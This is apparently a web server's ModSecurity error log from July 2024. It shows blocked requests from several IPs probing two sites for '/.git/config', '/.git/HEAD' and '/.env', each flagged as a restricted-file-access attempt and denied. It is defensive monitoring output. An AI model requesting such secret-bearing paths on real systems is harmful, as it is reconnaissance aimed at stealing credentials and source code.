[Fri Jul 26 05:09:39.932117 2024] [:error] [pid 718940] [client 45.148.10.142:53230] [client 45.148.10.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZqMTc1ZZb08EShEGKymsHgAAAAY"]
[Fri Jul 26 05:09:39.932604 2024] [:error] [pid 718940] [client 45.148.10.142:53230] [client 45.148.10.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZqMTc1ZZb08EShEGKymsHgAAAAY"]
[Fri Jul 26 05:09:40.843217 2024] [:error] [pid 718413] [client 45.148.10.142:53246] [client 45.148.10.142] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZqMTdNgukMeVVSuMmraPPgAAAAU"]
[Fri Jul 26 05:09:40.843854 2024] [:error] [pid 718413] [client 45.148.10.142:53246] [client 45.148.10.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZqMTdNgukMeVVSuMmraPPgAAAAU"]
[Fri Jul 26 05:09:40.844332 2024] [:error] [pid 718413] [client 45.148.10.142:53246] [client 45.148.10.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZqMTdNgukMeVVSuMmraPPgAAAAU"]
[Fri Jul 26 05:27:59.882630 2024] [:error] [pid 721156] [client 36.70.97.142:58098] [client 36.70.97.142] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/"] [unique_id "ZqMXv9NTEGArChAvb5V_KgAAAAs"]
[Fri Jul 26 05:27:59.883280 2024] [:error] [pid 721156] [client 36.70.97.142:58098] [client 36.70.97.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/"] [unique_id "ZqMXv9NTEGArChAvb5V_KgAAAAs"]
[Fri Jul 26 05:27:59.883675 2024] [:error] [pid 721156] [client 36.70.97.142:58098] [client 36.70.97.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/"] [unique_id "ZqMXv9NTEGArChAvb5V_KgAAAAs"]
[Fri Jul 26 05:28:01.296733 2024] [:error] [pid 721158] [client 36.70.97.142:61441] [client 36.70.97.142] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "ZqMXwWKqObNELj1WgqPXjQAAAAw"]
[Fri Jul 26 05:28:01.297354 2024] [:error] [pid 721158] [client 36.70.97.142:61441] [client 36.70.97.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "ZqMXwWKqObNELj1WgqPXjQAAAAw"]
[Fri Jul 26 05:28:01.297820 2024] [:error] [pid 721158] [client 36.70.97.142:61441] [client 36.70.97.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "ZqMXwWKqObNELj1WgqPXjQAAAAw"]
[Fri Jul 26 06:14:08.712963 2024] [:error] [pid 721155] [client 83.147.52.49:33712] [client 83.147.52.49] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZqMikN8COCDS6EizjsvzvgAAAAo"]
[Fri Jul 26 06:14:08.713780 2024] [:error] [pid 721155] [client 83.147.52.49:33712] [client 83.147.52.49] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZqMikN8COCDS6EizjsvzvgAAAAo"]
[Fri Jul 26 06:14:08.714207 2024] [:error] [pid 721155] [client 83.147.52.49:33712] [client 83.147.52.49] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZqMikN8COCDS6EizjsvzvgAAAAo"]
[Fri Jul 26 07:39:48.001227 2024] [:error] [pid 721158] [client 45.148.10.230:42224] [client 45.148.10.230] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZqM2o2KqObNELj1WgqPXkgAAAAw"]
[Fri Jul 26 07:39:48.002769 2024] [:error] [pid 721158] [client 45.148.10.230:42224] [client 45.148.10.230] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZqM2o2KqObNELj1WgqPXkgAAAAw"]
[Fri Jul 26 07:39:48.003214 2024] [:error] [pid 721158] [client 45.148.10.230:42224] [client 45.148.10.230] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZqM2o2KqObNELj1WgqPXkgAAAAw"]
[Fri Jul 26 07:39:48.175194 2024] [:error] [pid 721168] [client 45.148.10.230:42990] [client 45.148.10.230] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZqM2pDkFM2wFHCKgl8AYZgAAAA0"]
[Fri Jul 26 07:39:48.175806 2024] [:error] [pid 721168] [client 45.148.10.230:42990] [client 45.148.10.230] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZqM2pDkFM2wFHCKgl8AYZgAAAA0"]
[Fri Jul 26 07:39:48.176230 2024] [:error] [pid 721168] [client 45.148.10.230:42990] [client 45.148.10.230] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZqM2pDkFM2wFHCKgl8AYZgAAAA0"]
[Fri Jul 26 09:37:39.890844 2024] [:error] [pid 721155] [client 45.148.10.142:57636] [client 45.148.10.142] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZqNSQ98COCDS6EizjsvzxwAAAAo"]
[Fri Jul 26 09:37:39.891596 2024] [:error] [pid 721155] [client 45.148.10.142:57636] [client 45.148.10.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZqNSQ98COCDS6EizjsvzxwAAAAo"]
[Fri Jul 26 09:37:39.892009 2024] [:error] [pid 721155] [client 45.148.10.142:57636] [client 45.148.10.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "ZqNSQ98COCDS6EizjsvzxwAAAAo"]
[Fri Jul 26 09:37:40.935894 2024] [:error] [pid 721035] [client 45.148.10.142:57640] [client 45.148.10.142] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZqNSRE9Kg-s-hOp6Vd31GAAAAAg"]
[Fri Jul 26 09:37:40.936722 2024] [:error] [pid 721035] [client 45.148.10.142:57640] [client 45.148.10.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZqNSRE9Kg-s-hOp6Vd31GAAAAAg"]
[Fri Jul 26 09:37:40.937258 2024] [:error] [pid 721035] [client 45.148.10.142:57640] [client 45.148.10.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "ZqNSRE9Kg-s-hOp6Vd31GAAAAAg"]
[Fri Jul 26 17:50:02.612662 2024] [:error] [pid 732326] [client 45.148.10.230:38674] [client 45.148.10.230] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZqPFqqjzA_zsfkUtYcDCoAAAAAQ"]
[Fri Jul 26 17:50:02.613409 2024] [:error] [pid 732326] [client 45.148.10.230:38674] [client 45.148.10.230] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZqPFqqjzA_zsfkUtYcDCoAAAAAQ"]
[Fri Jul 26 17:50:02.613894 2024] [:error] [pid 732326] [client 45.148.10.230:38674] [client 45.148.10.230] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZqPFqqjzA_zsfkUtYcDCoAAAAAQ"]
[Fri Jul 26 17:50:02.831861 2024] [:error] [pid 718413] [client 45.148.10.230:39594] [client 45.148.10.230] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZqPFqtgukMeVVSuMmraPdwAAAAU"]
[Fri Jul 26 17:50:02.832455 2024] [:error] [pid 718413] [client 45.148.10.230:39594] [client 45.148.10.230] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZqPFqtgukMeVVSuMmraPdwAAAAU"]
[Fri Jul 26 17:50:02.832947 2024] [:error] [pid 718413] [client 45.148.10.230:39594] [client 45.148.10.230] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZqPFqtgukMeVVSuMmraPdwAAAAU"]
[Sat Jul 27 23:14:37.936498 2024] [:error] [pid 740818] [client 45.148.10.230:42016] [client 45.148.10.230] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZqVjPQFX89GdbwQWrVvTigAAAAQ"]
[Sat Jul 27 23:14:37.937181 2024] [:error] [pid 740818] [client 45.148.10.230:42016] [client 45.148.10.230] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZqVjPQFX89GdbwQWrVvTigAAAAQ"]
[Sat Jul 27 23:14:37.937791 2024] [:error] [pid 740818] [client 45.148.10.230:42016] [client 45.148.10.230] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "ZqVjPQFX89GdbwQWrVvTigAAAAQ"]
[Sat Jul 27 23:14:38.060938 2024] [:error] [pid 740819] [client 45.148.10.230:42020] [client 45.148.10.230] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZqVjPkXUm6mb5o3KSzs4WAAAAAU"]
[Sat Jul 27 23:14:38.061534 2024] [:error] [pid 740819] [client 45.148.10.230:42020] [client 45.148.10.230] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZqVjPkXUm6mb5o3KSzs4WAAAAAU"]
[Sat Jul 27 23:14:38.061974 2024] [:error] [pid 740819] [client 45.148.10.230:42020] [client 45.148.10.230] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZqVjPkXUm6mb5o3KSzs4WAAAAAU"]
[Mon Jul 29 09:31:06.737288 2024] [:error] [pid 788050] [client 45.148.10.230:50038] [client 45.148.10.230] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZqdFOvI2VrXq-FTQQC5SWwAAAAU"]
[Mon Jul 29 09:31:06.739192 2024] [:error] [pid 788050] [client 45.148.10.230:50038] [client 45.148.10.230] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZqdFOvI2VrXq-FTQQC5SWwAAAAU"]
[Mon Jul 29 09:31:06.739626 2024] [:error] [pid 788050] [client 45.148.10.230:50038] [client 45.148.10.230] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "ZqdFOvI2VrXq-FTQQC5SWwAAAAU"]
